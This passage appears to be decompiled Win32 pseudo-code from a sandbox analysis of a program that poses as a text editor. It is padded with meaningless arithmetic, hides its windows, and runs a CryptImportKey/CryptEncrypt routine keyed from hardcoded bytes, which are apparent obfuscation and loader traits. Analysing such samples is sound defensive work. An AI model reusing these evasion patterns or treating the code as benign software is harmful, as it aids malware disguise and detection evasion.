																	asm("cvtdq2pd xmm1, xmm1");
																	asm("subsd xmm2, xmm1");
																	asm("subsd xmm2, xmm0");
																	asm("cvttsd2si eax, xmm2");
																	 *0x469388 = _t833 / _t1245;
																	E004060C1(_t1149);
																	E00408915(_t1533 + 0x40);
																	E004305CB( *(_t1533 + 0x40));
																	_t838 =  *0x46ab98; // 0x0
																	_t1150 =  *0x46aee4; // 0x0
																	_t1518 =  *0x469388; // 0x0
																	 *(_t1533 + 0x38) = _t838;
																	E004345E0(_t1533 + 0xc0, 0, 0x38);
																	_t841 =  *0x46ab74; // 0x0
																	 *(_t1533 + 0xc4) = _t841;
																	asm("movsd");
																	asm("movsd");
																	_t1534 = _t1533 + 0x10;
																	asm("movsw");
																	_t1483 = CreateFontIndirectA(_t1534 + 0xb4);
																	 *(_t1534 + 0x20) = SelectObject(_t1150, _t1483);
																	SetTextColor(_t1150, 0);
																	_t1248 = _t1534 + 0x478;
																	_t1376 = _t1248 + 1;
																	do {
																		_t846 =  *_t1248;
																		_t1248 = _t1248 + 1;
																		__eflags = _t846;
																	} while (_t846 != 0);
																	TextOutA(_t1150, _t1518,  *(_t1534 + 0x38), _t1534 + 0x47c, _t1248 - _t1376);
																	SelectObject(_t1150,  *(_t1534 + 0x20));
																	DeleteObject(_t1483);
																	__eflags =  *0x46aba8;
																	if( *0x46aba8 == 0) {
																		L179:
																		__eflags = 0;
																		 *[fs:0x0] =  *((intOrPtr*)(_t1534 + 0x8c78));
																		return 0;
																	}
																	_t1152 = 0;
																	 *(_t1534 + 0x34) = 2;
																	 *((intOrPtr*)(_t1534 + 0x9c)) = 0x208;
																	 *((intOrPtr*)(_t1534 + 0xa0)) = 0x6601;
																	 *(_t1534 + 0xa4) = 8;
																	_t1485 = 0;
																	__eflags = 0;
																	_t1444 = 7;
																	do {
																		_t1377 = 0x46ab78[_t1485];
																		_t855 = _t1377 >> _t1485 | _t1152 | 0x00000001;
																		_t1152 = _t1377 << _t1444;
																		 *(_t1534 + _t1485 + 0xa4) = _t855;
																		_t1485 = _t1485 + 1;
																		_t1444 = _t1444 - 1;
																		__eflags = _t1485 - 7;
																	} while (_t1485 < 7);
																	 *(_t1534 + _t1485 + 0xac) = _t1152 | 0x00000001;
																	CryptAcquireContextA(_t1534 + 0x3c, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
																	_t859 = 0x14;
																	CryptImportKey( *(_t1534 + 0x40));
																	_t862 = _t1534 + 0x34;
																	__imp__CryptSetKeyParam( *((intOrPtr*)(_t1534 + 0x1c)), 4, _t862, 0, _t1534 + 0xa8, _t859, 0, 0, _t1534 + 0x10);
																	__eflags = _t862;
																	if(_t862 == 0) {
																		CryptDestroyKey( *(_t1534 + 0x10));
																		CryptReleaseContext( *(_t1534 + 0x30), 0);
																	}
																	_t863 = 8;
																	 *((intOrPtr*)(_t1534 + 0x24)) = _t863;
																	__imp__CryptEncrypt( *((intOrPtr*)(_t1534 + 0x28)), 0, 0, 0, 0x46ab98, _t1534 + 0x24, _t863);
																	CryptDestroyKey( *(_t1534 + 0x10));
																	CryptReleaseContext( *(_t1534 + 0x30), 0);
																	goto L179;
																}
																 *(_t1533 + 0x18) =  *(_t1533 + 0x14) & 0x0000ffff;
																 *(_t1533 + 0x50) = _t1149 & 0x000000ff;
																 *(_t1533 + 0x30) =  *(_t1533 + 0x14) & 0x0000ffff;
																_t1383 = 0x1e;
																_t1384 = _t1383 - _t1243;
																__eflags = _t1384;
																 *(_t1533 + 0x60) = _t1384;
																do {
																	 *(_t1533 + 0x2b) =  *((intOrPtr*)(_t826 +  *(_t1533 + 0x2c)));
																	_t1149 = _t1481 * _t1243 * 0xf - _t1440;
																	L00434B6E(_t1243,  *(_t1533 + 0x2c), __eflags, _t1533 + 0x88);
																	_t873 =  *0x46ab80; // 0x0
																	_pop(_t1253);
																	_t1386 = 2 + _t873 * 2;
																	__eflags = _t1386;
																	if(__eflags > 0) {
																		_t923 =  *0x46ab84; // 0x788
																		 *0x46ab74 =  *0x46ab74 + (_t923 +  *0x46ab78) * _t1386;
																		__eflags =  *0x46ab74;
																	}
																	L00434B6E(_t1253, _t1386, __eflags, _t1533 + 0xf0);
																	__eflags =  *0x46ab88;
																	if( *0x46ab88 == 0) {
																		_t1440 = _t1440 *  *(_t1533 + 0x60);
																		__eflags = _t1440;
																	}
																	 *(_t1533 + 0x2b) =  *(_t1533 + 0x2b) ^ _t1149;
																	GetFileInformationByHandle( *(_t1533 + 0x34), _t1533 + 0xb4);
																	__eflags =  *0x46ab80;
																	if( *0x46ab80 != 0) {
																		asm("xorps xmm0, xmm0");
																		asm("movlpd [esp+0x84], xmm0");
																		asm("movlpd [esp+0xfc], xmm0");
																		_t918 = QueryPerformanceCounter(_t1533 + 0x80);
																		__eflags = _t918;
																		if(_t918 != 0) {
																			__eflags =  *0x46ab84;
																			if( *0x46ab84 == 0) {
																				 *(_t1533 + 0x20) = L00434A31("Timer", "a");
																			}
																			QueryPerformanceCounter(_t1533 + 0xf8);
																			_t1276 =  *0x46ab84; // 0x788
																			__eflags = _t1276;
																			if(__eflags == 0) {
																				_push( *0x46ab74);
																				_push("Start Value %i\n");
																				_push( *((intOrPtr*)(_t1533 + 0x28)));
																				E00434A46(_t1149, _t1440, _t1481, __eflags);
																				_t1533 = _t1533 + 0xc;
																			}
																		}
																	}
																	_t882 =  *0x46ab84; // 0x788
																	_t520 = _t882 + 0x3a; // 0x7c2
																	asm("cdq");
																	_t1258 =  *0x46ab88; // 0x0
																	 *(_t1533 + 0x68) =  &(_t1481[( *((intOrPtr*)(_t1533 + 0x10)) - _t1440 + 0x1e) * ( *(_t1533 + 0x38) + _t1440)]) + 5;
																	_t884 =  *0x46ab78; // 0x8ba69010
																	asm("cdq");
																	_t1260 =  *0x46ab84; // 0x788
																	_t886 =  *0x46ab80; // 0x0
																	_t1262 =  *0x46ab78; // 0x8ba69010
																	_t1481 =  *(_t1533 + 0x68);
																	 *((intOrPtr*)(_t1533 + 0x3c)) = (_t1262 & 0x000000ff) + (_t1260 & 0x0000ffff) * (_t886 & 0x0000ffff) +  *(_t1533 + 0x18) + _t882 / _t520 + _t884 / (_t1258 + 0x33);
																	__eflags = (_t886 & 0x000000ff) +  *0x46ab74 - ( *0x46ab8c & 0x0000ffff);
																	_t1394 =  >=  ?  *(_t1533 + 0x30) :  *((intOrPtr*)(_t1533 + 0x3c));
																	__eflags = _t1440 - _t1481 + 4;
																	if(_t1440 == _t1481 + 4) {
																		_t1481 = _t1481 +  *(_t1533 + 0x38) - _t1149;
																		__eflags = _t1481;
																	}
																	_t1395 = _t1394 +  *(_t1533 + 0x14) -  *0x46ab74 -  *0x46ab88 -  *0x46ab80;
																	_t893 =  *0x46ab78; // 0x8ba69010
																	 *((intOrPtr*)(_t1533 + 0x3c)) = _t1395;
																	__eflags =  *(_t1533 + 0x50) + _t1395 - (_t893 & 0x0000ffff) -  *(_t1533 + 0x14) +  *0x46ab84;
																	if( *(_t1533 + 0x50) + _t1395 == (_t893 & 0x0000ffff) -  *(_t1533 + 0x14) +  *0x46ab84) {
																		asm("movd xmm0, edx");
																		asm("cvtdq2pd xmm0, xmm0");
																		asm("addsd xmm0, [eax*8+0x44d920]");
																		asm("movsd [esp+0x68], xmm0");
																		L00434CA0(_t1395, _t1565);
																		asm("movd xmm1, eax");
																		asm("cvtdq2pd xmm1, xmm1");
																		_t914 =  *(_t1533 + 0x14) >> 0x1f;
																		__eflags = _t914;
																		asm("addsd xmm1, [eax*8+0x44d920]");
																		asm("subsd xmm0, xmm1");
																		asm("movd xmm1, dword [0x46ab74]");
																		asm("cvtdq2pd xmm1, xmm1");
																		asm("addsd xmm0, [esp+0x68]");
																		asm("addsd xmm0, xmm1");
																		asm("cvttsd2si eax, xmm0");
																		 *0x46ab74 = _t914;
																	}
																	__eflags = _t1440 + _t1481 - 0x4f;
																	if(_t1440 + _t1481 > 0x4f) {
																		_t1481 = _t1481 * 3;
																		__eflags = _t1481;
																	}
																	_t1396 =  *(_t1533 + 0x38);
																	__eflags = _t1396;
																	_t1271 =  !=  ?  *(_t1533 + 0x2b) & 0x000000ff :  *(_t1533 + 0x2c) & 0x000000ff;
																	 *((char*)( *((intOrPtr*)(_t1533 + 0x10)) +  *(_t1533 + 0x2c))) =  !=  ?  *(_t1533 + 0x2b) & 0x000000ff :  *(_t1533 + 0x2c) & 0x000000ff;
																	__eflags =  *0x46ab80;
																	_t1522 =  *(_t1533 + 0x14);
																	if( *0x46ab80 == 0) {
																		__eflags = _t1149 - _t1440 + _t1396;
																		if(_t1149 == _t1440 + _t1396) {
																			_t1149 =  ~_t1149 - _t1396 + _t1396;
																			__eflags = _t1149;
																		}
																		_t1440 = _t1440 + _t1149;
																		__eflags = _t1440;
																	}
																	_t1272 =  *0x46ab84; // 0x788
																	_t900 =  *0x46ab78; // 0x8ba69010
																	asm("cdq");
																	 *0x46ab74 =  *0x46ab74 + _t1533 + _t900 / (_t1272 + 0x62) * (_t1533 + 0x00000478 & 0x0000ffff) *  *(_t1533 + 0x14) +  *(_t1533 + 0x30) +  *((intOrPtr*)(_t1533 + 0x3c)) + 0x170;
																	__eflags =  *0x46ab8c;
																	if( *0x46ab8c != 0) {
																		__eflags = _t1481 - _t1440;
																		if(_t1481 > _t1440) {
																			_t1440 = _t1440 * 9;
																			__eflags = _t1440;
																		}
																	}
																	_t1275 = 0xd;
																	 *(_t1533 + 0x60) =  *(_t1533 + 0x60) - _t1275;
																	_t1243 =  *(_t1533 + 0x38);
																	_t826 =  *((intOrPtr*)(_t1533 + 0x10)) + 1;
																	 *((intOrPtr*)(_t1533 + 0x10)) = _t826;
																	__eflags = _t826 - _t1522;
																} while (__eflags < 0);
																_t1517 =  *(_t1533 + 0x58);
																goto L169;
															} else {
																goto L141;
															}
															do {
																L141:
																SetWindowLongA( *0x46abac, 0xffffffec, 0x80);
																_t1279 =  *((intOrPtr*)(_t1479 + 8));
																_t927 =  *0x46addc; // 0x0
																asm("movsd xmm0, [0x44d918]");
																 *((char*)(_t1439 + _t927)) = _t1279;
																_push(_t1279);
																_push(_t1279);
																asm("movsd [esp], xmm0");
																E00434850(_t1279, _t1439);
																 *((long long*)(_t1533 + 0x88)) = _t1565;
																asm("movsd xmm0, [esp+0x88]");
																asm("movd xmm1, dword [0x46aba8]");
																asm("cvtpd2ps xmm0, xmm0");
																asm("cvtdq2ps xmm1, xmm1");
																asm("mulss xmm1, xmm0");
																asm("movd xmm0, eax");
																asm("cvtdq2ps xmm0, xmm0");
																asm("mulss xmm1, xmm0");
																asm("movss [esp+0x20], xmm1");
																_t1565 =  *(_t1533 + 0x20);
																_t931 = L00434C26();
																_t1479 =  *_t1479;
																_t1439 = _t1439 + 1;
																_t1516 = _t931;
																__eflags = _t1439 - _t1149;
															} while (_t1439 < _t1149);
															goto L142;
														}
														_t1523 =  *(_t1533 + 0x20);
														do {
															_t1282 =  *0x46ab80; // 0x0
															_t932 =  *(_t1533 + 0x9c);
															asm("cdq");
															_t1283 = _t1282 + 0x5d;
															_t1373 = _t932 % _t1283;
															__eflags = _t932 / _t1283 *  *0x46ab94;
															if(_t932 / _t1283 *  *0x46ab94 != 0) {
																 *0x46ab74 =  *0x46ab74 - _t1523;
																__eflags =  *0x46ab74;
															}
															_t462 = _t1438 + E004051A8; // 0x4051a8
															E0040595D(_t1533 + 0x48, _t1478, _t462);
															_t1478 =  *(_t1533 + 0x40);
															_t1438 = _t1438 + 1;
															__eflags = _t1438 - _t1149;
														} while (_t1438 < _t1149);
														_t1516 =  *(_t1533 + 0x58);
														goto L140;
													}
													_t1160 = 0xc;
													do {
														_push(_t1533 + 0xc78);
														_push(0x7fff);
														_t944 = 0xd;
														SendMessageA( *(_t1533 + 0x180 + _t1446 * 4), _t944, ??, ??);
														SendMessageA( *(_t1533 + 0x17c + _t1446 * 4), _t1160, 0, _t1533 + 0xc78);
														 *((intOrPtr*)(_t1533 + 0x880 + _t1446 * 4)) = E004346BB(_t1160, _t1373,  *((intOrPtr*)(_t1533 + 0x87c + _t1446 * 4)));
														 *((intOrPtr*)(_t1533 + 0x480 + _t1446 * 4)) = E004346BB(_t1160, _t1373,  *((intOrPtr*)(_t1533 + 0x480 + _t1446 * 4)));
														_t1446 = _t1446 + 1;
														__eflags = _t1446 - _t1475;
													} while (_t1446 <= _t1475);
													goto L126;
												}
												__eflags = _t1475;
												if(_t1475 != 0) {
													goto L122;
												}
												_push(0x44d651);
												_push(_t1475);
												_t950 = 0xc;
												SendMessageA( *(_t1533 + 0x17c), _t950, ??, ??);
												E004346BB(_t1144, _t1373, _t1533 + 0x270);
												E004346BB(_t1144, _t1373, _t1533 + 0x274);
												goto L126;
											}
											_t1447 = _t1475;
											do {
												ShowWindow( *(_t1533 + 0x174 + _t1475 * 4), 0);
												_t1447 = _t1447 - 1;
												__eflags = _t1447;
											} while (_t1447 != 0);
											__eflags = _t1475;
											goto L119;
										}
									} else {
										_t1491 = _t1474 + 1;
										__eflags = _t1491;
										do {
											ShowWindow(_t1432, 0); // executed
											_t1491 = _t1491 - 1;
											__eflags = _t1491;
										} while (_t1491 != 0);
										goto L112;
									}
								}
								__eflags =  *0x46aba8;
								if( *0x46aba8 == 0) {
									goto L90;
								}
								_t1493 = _t1373;
								do {
									_t970 =  *_t1373;
									_t1373 = _t1373 + 1;
									__eflags = _t970;
								} while (_t970 != 0);
								_t1373 = _t1373 - _t1493;
								_t1449 = _t1531 + 0x270 - 1;
								__eflags = _t1449;
								do {
									_t971 =  *(_t1449 + 1);
									_t1449 = _t1449 + 1;
									__eflags = _t971;
								} while (_t971 != 0);
								_t1292 = _t1373 >> 2;
								memcpy(_t1449, _t1493, _t1292 << 2);
								_t1295 = _t1373 & 0x00000003;
								__eflags = _t1295;
								memcpy(_t1493 + _t1292 + _t1292, _t1493, _t1295);
								_t1531 = _t1531 + 0x18;
								goto L90;
							} else {
								_t1162 =  *((intOrPtr*)(_t1527 + 0xa4));
								_t1454 =  *(_t1527 + 0x7c);
								_t1494 =  *(_t1527 + 0x74);
								 *((intOrPtr*)(_t1527 + 0x48)) = 0x15;
								 *((intOrPtr*)(_t1527 + 0x4c)) = 0xa6;
								 *((intOrPtr*)(_t1527 + 0x44)) =  *((intOrPtr*)(_t1527 + 0x14));
								 *((intOrPtr*)(_t1527 + 0x2c)) = _t1162;
								 *(_t1527 + 0x3c) =  *(_t1527 + 0x7c);
								 *(_t1527 + 0x10) = _t1494;
								while(1) {
									 *(_t1527 + 0x18) =  *(_t1527 + 0x18) & 0x00000000;
									 *(_t1527 + 0x1c) =  *(_t1527 + 0x1c) & 0x00000000;
									 *(_t1527 + 0x18) = E004085C3(_t1162, _t1372, _t1454);
									 *(_t1527 + 0x8c88) = 4;
									E00406055(_t1527 + 0x20, _t1527 + 0xfc, _t1527 + 0x48);
									_t1372 = 0x46aef0;
									_t1301 = ( *0x46ab8c & 0x0000ffff) - ( *0x469388 & 0x000000ff) - 0xaef0;
									_t981 =  *0x46ab78; // 0x8ba69010
									 *0x46ab78 = _t981 + 1 + _t1301;
									_t984 =  *0x46ab98; // 0x0
									__eflags = _t984 -  *0x46ab90; // 0x0
									if(__eflags == 0) {
										asm("movd xmm0, eax");
										asm("cvtdq2pd xmm0, xmm0");
										_push(_t1301);
										asm("addsd xmm0, [eax*8+0x44d920]");
										_push(_t1301);
										asm("cvtpd2ps xmm0, xmm0");
										asm("cvtps2pd xmm0, xmm0");
										asm("movsd [esp], xmm0");
										E00434850(_t1301, _t1454);
										 *((long long*)(_t1527 + 0x28)) = _t1565;
										__eflags = ( *0x46ab80 & 0x0000ffff) *  *0x46ab78;
										asm("movsd xmm1, [esp+0x28]");
										asm("movd xmm0, eax");
										asm("cvtpd2ps xmm1, xmm1");
										asm("cvtdq2ps xmm0, xmm0");
										asm("movd xmm2, ebx");
										asm("cvtdq2ps xmm2, xmm2");
										asm("addss xmm0, xmm1");
										asm("subss xmm2, xmm0");
										asm("cvttss2si ebx, xmm2");
										 *((intOrPtr*)(_t1527 + 0x2c)) = _t1162;
									}
									_t985 = GetTextFaceA( *0x46aba8, 0, 0);
									_t1163 =  *0x46ab88; // 0x0
									 *(_t1527 + 0x20) = _t985;
									__eflags = _t1162 == _t1163;
									if(_t1162 == _t1163) {
										_t986 =  *0x46aba8; // 0x0
										asm("cdq");
										_t1495 = _t1494 + (_t986 + _t1372 >> 5) - (_t1494 & 0x0000ffff) - ( *0x46ab98 & 0x000000ff) + (_t1163 & 0x000000ff) -  *0x46ab74 +  *((intOrPtr*)(_t1527 + 0x70));
										__eflags = _t1495;
										 *(_t1527 + 0x10) = _t1495;
									} else {
										asm("movd xmm0, dword [esp+0x70]");
										asm("cvtdq2pd xmm0, xmm0");
										_t1061 = L00434CA0(_t1372, _t1565);
										asm("movd xmm1, esi");
										asm("cvtdq2pd xmm1, xmm1");
										asm("subsd xmm1, xmm0");
										asm("movd xmm0, ebx");
										asm("cvtdq2pd xmm0, xmm0");
										asm("subsd xmm1, xmm0");
										asm("cvttsd2si eax, xmm1");
										 *((intOrPtr*)(_t1527 + 0x2c)) = _t1061;
									}
									_t994 =  *0x46ab80; // 0x0
									 *(_t1527 + 0x40) = _t994;
									E00406055(_t1527 + 0x20, _t1527 + 0x164, _t1527 + 0x40);
									E004088F4(_t1527 + 0x18);
									_t999 = GetViewportExtEx( *0x46aba8, 0);
									_push(0);
									_push(0);
									_push( *0x46aba8);
									_t1455 = _t999;
									_push( *0x46abac);
									L0044C9DC();
									_push(0);
									L0044C9E2();
									SetWindowTextA( *0x46ab88, 0);
									_t1496 = GetViewportOrgEx(0, 0);
									LoadImageA( *(_t1527 + 0x8ca0),  *0x46ab98 & 0x0000ffff, 1,  *0x46ab78,  *0x46ab74, 0);
									_t1165 =  *0x46aba4; // 0x0
									_t1313 = 1 - (_t1165 & 0x000000ff) -  *0x46ab74;
									__eflags = 1 - 0x46aef0;
									if(1 > 0x46aef0) {
										_t1165 =  *((intOrPtr*)(_t1527 + 0x2db)) -  *0x46af08 -  *0x46ab98;
										__eflags = _t1165;
										 *0x46aba4 = _t1165;
									}
									_t1005 =  *0x46abac; // 0x0
									__eflags = _t1005 - _t1496;
									if(_t1005 != _t1496) {
										goto L64;
									}
									__eflags =  *(_t1527 + 0x20) -  *0x46ab80; // 0x0
									if(__eflags != 0) {
										goto L64;
									}
									__eflags = _t1455 -  *0x46ab88;
									if(_t1455 !=  *0x46ab88) {
										goto L64;
									}
									RedrawWindow(_t1005, 0, 0, 0x101);
									_t1497 =  *0x46ab8c; // 0x12f8f0
									_t1165 =  *0x46aba4; // 0x0
									_t1454 =  *(_t1527 + 0x3c);
									L65:
									asm("movd xmm0, dword [esp+0x78]");
									asm("cvtdq2ps xmm0, xmm0");
									asm("cvtps2pd xmm0, xmm0");
									E004353B0(_t1315, _t1565);
									_t1010 =  *0x46ab9c; // 0x788
									_t1011 = _t1165 & 0x000000ff;
									_t1317 = (_t1010 & 0x000000ff) + _t1011;
									asm("xorps xmm1, xmm1");
									asm("cvtsd2ss xmm1, xmm0");
									asm("movd xmm0, ecx");
									asm("cvtdq2ps xmm0, xmm0");
									asm("movd xmm2, edi");
									asm("cvtdq2ps xmm2, xmm2");
									asm("subss xmm0, xmm1");
									asm("subss xmm2, xmm0");
									asm("cvttss2si eax, xmm2");
									 *(_t1527 + 0x3c) = _t1011;
									__eflags = _t1497;
									if(_t1497 == 0) {
										_t1498 = 0x58;
										_t1166 = 0;
										__eflags = 0;
										E004345E0(_t1527 + 0x104, 0, _t1498);
										_t1014 = _t1527 + 0x484;
										_t1527 = _t1527 + 0xc;
										 *(_t1527 + 0x11c) = _t1014;
										 *((intOrPtr*)(_t1527 + 0x104)) = _t1498;
										 *((intOrPtr*)(_t1527 + 0x108)) = 0;
										 *((char*)(_t1527 + 0x47c)) = 0;
										 *((intOrPtr*)(_t1527 + 0x124)) = 0x104;
										 *((intOrPtr*)(_t1527 + 0x110)) = 0x46abb0;
										 *(_t1527 + 0x11c) = 1;
										 *((intOrPtr*)(_t1527 + 0x128)) = 0;
										 *((intOrPtr*)(_t1527 + 0x12c)) = 0;
										 *((intOrPtr*)(_t1527 + 0x130)) = 0;
										 *((intOrPtr*)(_t1527 + 0x138)) = 0x1800;
										GetOpenFileNameA(_t1527 + 0x100);
										L75:
										 *(_t1527 + 0x8c80) =  *(_t1527 + 0x8c80) | 0xffffffff;
										_t1203 = _t1527 + 0x18;
										E004060C1(_t1166);
										_t1136 =  *0x46ab9c; // 0x788
										_t1494 =  *(_t1527 + 0x10);
										_t1019 =  *(_t1527 + 0x38) + 1;
										 *(_t1527 + 0x38) = _t1019;
										__eflags = _t1019 - _t1136;
										if(_t1019 < _t1136) {
											_t1162 =  *((intOrPtr*)(_t1527 + 0x2c));
											continue;
										}
										_t1419 =  *0x46ab80; // 0x0
										_t699 =  *0x46aba4; // 0x0
										_t1461 =  *0x46aba0; // 0x210
										goto L77;
									}
									asm("movsd xmm0, [0x44d918]");
									_t1020 = 9;
									_t1456 = _t1020;
									 *((intOrPtr*)(_t1527 + 0x68)) = 0x10;
									 *((intOrPtr*)(_t1527 + 0x6c)) = 0xbb;
									E004353B0(_t1317, _t1565);
									_t1166 =  *(_t1527 + 0x10);
									asm("xorps xmm1, xmm1");
									asm("addss xmm1, [0x44d90c]");
									asm("cvtsd2ss xmm0, xmm0");
									asm("addss xmm1, xmm0");
									asm("movss [esp+0x20], xmm1");
									do {
										 *(_t1527 + 0x30) =  *(_t1527 + 0x30) & 0x00000000;
										 *(_t1527 + 0x34) =  *(_t1527 + 0x34) & 0x00000000;
										_t1456 = _t1456 - 1;
										 *(_t1527 + 0x30) = E004085C3(_t1166, _t1372, _t1456);
										 *(_t1527 + 0x8c88) = 5;
										E0040601F(_t1527 + 0x38, _t1527 + 0x16c, _t1527 + 0x68);
										_t1026 =  *0x46abac; // 0x0
										 *(_t1527 + 0x50) = _t1026;
										 *(_t1527 + 0x54) = _t1026;
										E0040601F(_t1527 + 0x38, _t1527 + 0x15c, _t1527 + 0x50);
										_t1501 =  *0x46ab90; // 0x0
										_t1321 =  *0x46abac; // 0x0
										asm("cdq");
										asm("movss xmm1, [esp+0x20]");
										asm("movd xmm0, eax");
										asm("cvtdq2ps xmm0, xmm0");
										asm("subss xmm1, xmm0");
										asm("movd xmm0, dword [0x46ab98]");
										asm("cvtdq2ps xmm0, xmm0");
										asm("addss xmm1, xmm0");
										asm("movd xmm0, esi");
										asm("cvtdq2ps xmm0, xmm0");
										asm("addss xmm1, xmm0");
										asm("cvttss2si eax, xmm1");
										 *0x46ab90 = (_t1501 & 0x0000ffff) / (_t1321 + 0x35);
										_t1032 =  *0x46ab78; // 0x8ba69010
										 *(_t1527 + 0x60) = _t1032;
										_t1033 =  *0x46b100; // 0x80070057
										 *(_t1527 + 0x64) = _t1033;
										E0040601F(_t1527 + 0x30, _t1527 + 0xf4, _t1527 + 0x60);
										_t1037 =  *0x46aba4; // 0x0
										 *(_t1527 + 0x58) = _t1037;
										_t1038 =  *0x46ab84; // 0x788
										 *(_t1527 + 0x5c) = _t1038;
										E0040601F(_t1527 + 0x38, _t1527 + 0x8c, _t1527 + 0x58);
										_t1042 =  *0x46ab78 & 0x0000ffff;
										_t1325 =  *0x46ab84; // 0x788
										asm("cdq");
										_t1326 = _t1325 + 0x3d;
										_t1372 = _t1042 % _t1326;
										__eflags = _t1042 / _t1326 +  *0x46b100;
										if(_t1042 / _t1326 +  *0x46b100 != 0) {
											asm("fld1");
											_push(_t1326);
											_push(_t1326);
											 *_t1527 = _t1565;
											L00435AC0(_t1326, _t1456);
											 *((long long*)(_t1527 + 0x84)) = _t1565;
											asm("cdq");
											_t1332 = 9;
											_t1372 = 0xf0 % _t1332;
											asm("movsd xmm1, [esp+0x80]");
											__eflags =  *0x46ab80 + 0xf0 / _t1332;
											asm("movd xmm0, eax");
											asm("cvtdq2pd xmm0, xmm0");
											asm("addsd xmm1, xmm0");
											asm("movd xmm0, eax");
											asm("cvtdq2pd xmm0, xmm0");
											asm("subsd xmm1, xmm0");
											asm("cvttsd2si eax, xmm1");
											 *0x46ab74 =  *0x46ab94 & 0x0000ffff;
										}
										E004088F4(_t1527 + 0x30);
										_t1046 =  *0x46add4; // 0x0
										__eflags = _t1046 + _t1527 + 0x170;
										_t1503 =  *0x46aba8; // 0x0
										if(_t1046 + _t1527 + 0x170 == 0) {
											asm("movd xmm0, dword [esp+0x9c]");
											asm("cvtdq2pd xmm0, xmm0");
											L00434CA0(_t1372, _t1565);
											asm("movd xmm1, dword [0x46ab80]");
											asm("cvtdq2pd xmm1, xmm1");
											asm("movapd xmm2, xmm0");
											asm("subsd xmm2, xmm1");
											asm("movd xmm1, dword [esp+0xb4]");
											asm("cvtdq2pd xmm1, xmm1");
											asm("subsd xmm2, xmm1");
											asm("movd xmm1, eax");
											asm("cvtdq2pd xmm1, xmm1");
											asm("addsd xmm2, xmm1");
											asm("movd xmm1, dword [0x46ab94]");
											asm("cvtdq2pd xmm1, xmm1");
											asm("movd xmm0, eax");
											asm("cvtdq2pd xmm0, xmm0");
											asm("subsd xmm2, xmm1");
											asm("subsd xmm2, xmm0");
											asm("cvttsd2si eax, xmm2");
											 *0x46ab98 = _t1166 & 0x0000ffff;
										} else {
											 *0x469388 =  *0x469388 - _t1503;
										}
										SetDlgItemTextA(CreateDialogParamA( *(_t1527 + 0x8c9c), "PrintDlgBox",  *0x46abac, _t1503, 0),  *0x469388, _t1527 + 0x478);
										 *(_t1527 + 0x8c80) = 4;
										E004060C1(_t1166);
										__eflags = _t1456;
									} while (_t1456 != 0);
									goto L75;
									L64:
									asm("movd xmm0, dword [esp+0x78]");
									asm("cvtdq2ps xmm0, xmm0");
									asm("cvtps2pd xmm0, xmm0");
									E004353B0(_t1313, _t1565);
									_t1007 =  *0x46ab9c; // 0x788
									_t1454 =  *(_t1527 + 0x3c);
									asm("xorps xmm1, xmm1");
									asm("cvtsd2ss xmm1, xmm0");
									_t1315 = (_t1007 & 0x000000ff) + (_t1165 & 0x000000ff);
									asm("movd xmm0, ecx");
									asm("cvtdq2ps xmm0, xmm0");
									asm("movd xmm2, edi");
									asm("cvtdq2ps xmm2, xmm2");
									asm("subss xmm0, xmm1");
									_t1497 = 0;
									asm("subss xmm2, xmm0");
									asm("cvttss2si edi, xmm2");
									goto L65;
								}
							}
						}
						_t1459 =  *(_t1526 + 0x90);
						_t1513 =  *(_t1526 + 0x20);
						goto L21;
					}
					L46:
					_t133 = _t1514 + 0x43; // 0x43
					_t671 =  *0x46ab90; // 0x0
					_t1371 = (_t1460 & 0x0000ffff) * (_t1526 + 0x00000478 & 0x000000ff) -  *(_t1526 + 0x10) / _t133 + _t671 * _t1131;
					__eflags = _t1371;
					 *0x46aba4 = _t1371;
					goto L47;
				}
				 *((intOrPtr*)(_t1525 + 0x88)) = 0;
				 *((intOrPtr*)(_t1525 + 0x8c)) = 0;
				 *((intOrPtr*)(_t1525 + 0x90)) = 0;
				 *(_t1525 + 0x8c80) = 0;
				_t1539 =  *0x46ab80 - _t1355; // 0x0
				if(_t1539 == 0) {
					_t1510 =  *0x46abac; // 0x0
					 *(_t1525 + 0x27c) = _t1169;
					E004345E0(_t1525 + 0x279, 0, 0x103);
					_t1537 = _t1525 + 0xc;
					 *0x46abac = CreateAcceleratorTableA(0, 0);
					wsprintfA(_t1537 + 0x47c, "Save current changes in %s?", _t1537 + 0x270);
					_t1525 = _t1537 + 0xc;
					__eflags =  *0x46aba8; // 0x0
					if(__eflags == 0) {
						_t1109 =  *(_t1525 + 0x30);
					} else {
						_t1109 = MessageBoxA(_t1510, _t1525 + 0x480, 0x46acd0, 0x23);
					}
					__eflags = _t1109 - 6;
					if(_t1109 == 6) {
						SendMessageA(_t1510, 0x111,  *0x469388, 0);
					}
					L00401B18(_t1525 + 0xb8, 0, 0x44d653);
					 *(_t1525 + 0x8c80) = 2;
					L11:
					L00408C04(_t1130, _t1525 + 0x8c, 0, _t1525 + 0xb4);
					L00401E67(_t1525 + 0xb4);
					_t1169 =  *0x46aba8; // 0x0
					_t1355 = 0;
					L12:
					_t1114 =  *0x46abac; // 0x0
					 *0x46ab98 = ( &(_t1114->i) + _t1169) *  *0x469388 << 5;
					 *0x46ab88 = TranslateAcceleratorA(_t1355, _t1355, _t1525 + 0x98);
					TranslateMessage(_t1525 + 0x98);
					_t1123 =  *0x46aba8; // 0x0
					 *(_t1525 + 0x8c80) =  *(_t1525 + 0x8c80) | 0xffffffff;
					 *0x46ab78 = _t1123;
					E004088CE(_t1525 + 0x88);
					_t1355 = 0;
					goto L13;
				}
				_t1540 =  *0x46ab88 - _t1355; // 0x0
				if(_t1540 != 0) {
					 *0x469388 = 0;
					goto L12;
				} else {
					MessageBoxA(0, "Failed To read file", "TextEditor", 0);
					L00401B18(_t1525 + 0xb8, 0, 0x44d652);
					 *(_t1525 + 0x8c80) = 1;
					goto L11;
				}
			}

0x004060fb
0x00406100
0x0040610a
0x0040610f
0x00406116
0x0040611c
0x0040611e
0x00406124
0x004062b2
0x004062b9
0x004062c6
0x004062c7
0x004062c8
0x004062cb
0x004062d3
0x004062d4
0x004062d5
0x004062df
0x004062e0
0x004062e1
0x004062e9
0x004062fa
0x004062fc
0x00406304
0x00406308
0x0040630d
0x00406311
0x00406318
0x00406319
0x0040631d
0x00406321
0x00406325
0x00406329
0x0040632d
0x00406331
0x00406335
0x00406337
0x00406337
0x0040633d
0x00406352
0x0040635a
0x0040635a
0x00406367
0x0040636d
0x0040636d
0x00406375
0x0040638b
0x0040638f
0x00406395
0x004063b7
0x00406397
0x0040639f
0x0040639f
0x004063bd
0x004063c2
0x004063c9
0x004063c9
0x004063d3
0x004063d4
